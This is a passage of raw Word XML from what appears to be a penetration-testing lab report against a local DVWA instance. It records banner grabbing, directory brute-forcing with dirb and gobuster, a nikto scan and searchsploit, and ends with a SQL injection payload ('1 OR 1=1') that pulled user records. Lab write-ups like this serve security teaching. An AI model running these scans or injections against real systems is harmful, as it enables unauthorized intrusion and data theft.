            <wp:extent cx="2796907" cy="2048256"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="99764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41562" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2843127" cy="2082104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C0336" w14:textId="69FC87EB" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc215851890"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Service &amp; Version Scan Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="153B5551" w14:textId="2044BDE6" w:rsidR="00B40682" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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Nmap reconnaissance identified an active DVWA host on 127.0.0.1 running Apache HTTPD 2.4.65 on port 80 and MariaDB 11.8.3 on port 3306 over a Linux operating system.</w:t>
      </w:r>
      <w:r w:rsidR="00B40682" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="180091E6" w14:textId="7F0F9E5D"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lastRenderedPageBreak/>
        <w:t>3. HTTP fingerprint &amp; banner</w:t>
      </w:r>
      <w:r w:rsidR="00FD661A" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9F015" w14:textId="0BFCB723" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661A"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curl -I http://127.0.0.1/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC3310" w14:textId="5644C000" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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2686A8AD" wp14:editId="30E4C0DA">
            <wp:extent cx="3063413" cy="1682496"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="327050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050046" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3088815" cy="1696447"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FDA0E" w14:textId="00B9B5FF" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc215851891"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: HTTP Fingerprint &amp; Banner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="24CD44FF" w14:textId="17917B26" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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HTTP header analysis using curl revealed the target web application redirects to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ and is hosted on Apache HTTP Server version 2.4.65 running on a Debian-based system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCB27E"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 xml:space="preserve">Phase: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB86D08"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1. Directory discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B9D0E"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 xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04F110" w14:textId="2AD176D1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661A"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sudo</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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://127.0.0.1/dvwa/ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/common.txt -o dirb_results.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA0B785" w14:textId="0E9CFE15" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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37CC2EC4" wp14:editId="4CE19BCA">
            <wp:extent cx="3056419" cy="2136039"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1392217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17292" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3071069" cy="2146278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D24D5B" w14:textId="7543A1F1" w:rsidR="00FD661A" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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3EA87E99" wp14:editId="3057C5A6">
            <wp:extent cx="2946439" cy="2670048"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1420460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60038" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2956363" cy="2679041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53404A67" w14:textId="5BDCD164" w:rsidR="00FD661A" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD43D0" w14:textId="0D0F5E9D" w:rsidR="00FD661A" w:rsidRPr="00B40682" w:rsidRDefault="00FD661A"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sudo</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gobuster</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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://127.0.0.1/dvwa/ -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/common.txt -o gobuster_dirs.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC859AE" w14:textId="74FA9744" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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4C8A096F" wp14:editId="39783F1E">
            <wp:extent cx="3046730" cy="2048256"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="1769102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2445" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3056543" cy="2054853"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="032555FC" w14:textId="42B0C9BA" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc215851892"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">: Directory Enumeration Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A605BFE" w14:textId="581A20F9" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00220265"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Directory brute-forcing using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and DIRB revealed multiple accessible DVWA directories such as /config, /database, /docs, and /external, several of which were listable, indicating weak access controls. Sensitive files including php.ini, robots.txt, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> were also discovered, exposing potential configuration and information-leak entry points for further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08002CFF" w14:textId="77777777" w:rsidR="00B40682" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB608FF" w14:textId="48F55D11"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2. Automated web scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B841ACA" w14:textId="130F5800" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h http://&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-ip&gt; -output nikto.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604B6D7" w14:textId="339CF354" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00220265"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272FB7CE" wp14:editId="3E69FF88">
            <wp:extent cx="2819872" cy="1375258"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1102490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90920" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2838117" cy="1384156"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE70888" w14:textId="5AF2A670" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc215851893"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Automated Web Scan (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="333F2C9D" w14:textId="5F25F6EA" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00220265" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> identified missing security headers such as X-Frame-Options and X-Content-Type-Options, increasing exposure to clickjacking and MIME-based attacks. The scan also revealed insecure PHP configuration and directory indexing, indicating potential information disclosure and misconfiguration vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F4965" w14:textId="20E8509C"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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00BF0AEB" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OWASP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF70AD"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searchsploit</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apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75E42C7E" w14:textId="16EEA2C6" w:rsidR="00220265" w:rsidRPr="00B40682" w:rsidRDefault="00220265"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noProof/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BE7367B" wp14:editId="52D29EF7">
            <wp:extent cx="2852928" cy="1627174"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="153626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67577" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2877679" cy="1641291"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B294ED6" w14:textId="6EFDF1B4" w:rsidR="006C47BD" w:rsidRPr="00B40682" w:rsidRDefault="006C47BD" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing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DVWA security is set to low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47224D2D" w14:textId="61595494" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="006C47BD"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noProof/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF3AF40" wp14:editId="23AB532B">
            <wp:extent cx="2640787" cy="1345554"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="591544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44341" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2669922" cy="1360399"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F79742" w14:textId="44A3DE74" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc215851894"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006C47BD" w:rsidRPr="00B40682">
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidR="006C47BD" w:rsidRPr="00B40682">
        <w:t xml:space="preserve"> Web Exploitation (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7285A1" w14:textId="75D07581" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="006C47BD"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By injecting 1 OR 1=1 into the User ID parameter, input validation was bypassed and sensitive user records were successfully retrieved from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7A7AB" w14:textId="5E1E1747" w:rsidR="006C47BD" w:rsidRPr="00B40682" w:rsidRDefault="006C47BD"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436FE140" wp14:editId="7FA9FCD2">
            <wp:extent cx="3114356" cy="1711757"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="690411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11851" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3129872" cy="1720285"/>
